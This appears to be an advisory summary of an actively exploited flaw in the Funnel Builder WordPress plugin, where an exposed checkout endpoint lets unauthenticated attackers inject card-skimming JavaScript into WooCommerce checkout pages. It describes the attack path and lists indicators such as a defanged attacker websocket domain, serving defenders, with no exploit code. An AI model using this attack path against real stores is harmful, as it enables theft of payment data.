Full Report
A critical security vulnerability impacting the Funnel Builder plugin for WordPress has come under active exploitation in the wild to inject malicious JavaScript code into WooCommerce checkout pages with the goal of stealing payment data. Details of the activity were published by Sansec this week. The vulnerability currently does not have an official CVE identifier. It
Analysis Summary
# Vulnerability: Unauthenticated Settings Injection in Funnel Builder for WordPress
## CVE Details
- **CVE ID:** None assigned (as of report date)
- **CVSS Score:** N/A (Described as Critical)
- **CWE:** CWE-284 (Improper Access Control) / CWE-94 (Insecure Code Injection)
## Affected Systems
- **Products:** Funnel Builder plugin (by FunnelKit) for WordPress
- **Versions:** All versions prior to 3.15.0.3
- **Configurations:** WordPress installations using the Funnel Builder plugin in conjunction with WooCommerce.
## Vulnerability Description
The Funnel Builder plugin contains a publicly exposed checkout endpoint that allows unauthenticated callers to invoke internal methods. Due to a lack of permission checks or method white-listing, an attacker can trigger an internal method that writes data directly to the plugin’s "External Scripts" global setting. This allows an attacker to persist arbitrary JavaScript into the e-commerce store's checkout pages.
## Exploitation
- **Status:** Exploited in the wild (Magecart-style attack)
- **Complexity:** Low
- **Attack Vector:** Network (Remote/Unauthenticated)
## Impact
- **Confidentiality:** High (Theft of full payment card data, CVVs, and PII)
- **Integrity:** High (Unauthorized modification of site settings and injection of foreign code)
- **Availability:** Low
## Remediation
### Patches
- **Update to Version 3.15.0.3 or higher:** FunnelKit has released this version specifically to address the permission checks and close the exploit vector.
### Workarounds
- **Manual Cleanup:** If an update cannot be performed immediately, site administrators should manually inspect settings.
- **Path Restriction:** Restrict access to plugin-specific endpoints via a Web Application Firewall (WAF) to prevent unauthenticated interactions with sensitive plugin internals.
## Detection
- **Indicators of Compromise (IoCs):**
- Presence of unfamiliar scripts in **Settings > Checkout > External Scripts**.
- Payloads masquerading as Google Tag Manager (GTM) or Google Analytics.
- Known malicious domain/socket: `wss://protect-wss[.]com/ws`.
- **Detection Methods:**
- Deployment of File Integrity Monitoring (FIM) or specialized e-commerce security scanners (e.g., Sansec).
- Reviewing web logs for unusual POST requests to Funnel Builder checkout endpoints originating from unknown IPs.
## References
- hxxps[://]thehackernews[.]com/2026/05/funnel-builder-flaw-under-active.html
- hxxps[://]sansec[.]io/research/funnelkit-woocommerce-vulnerability-exploited
- hxxps[://]wordpress[.]org/plugins/funnel-builder/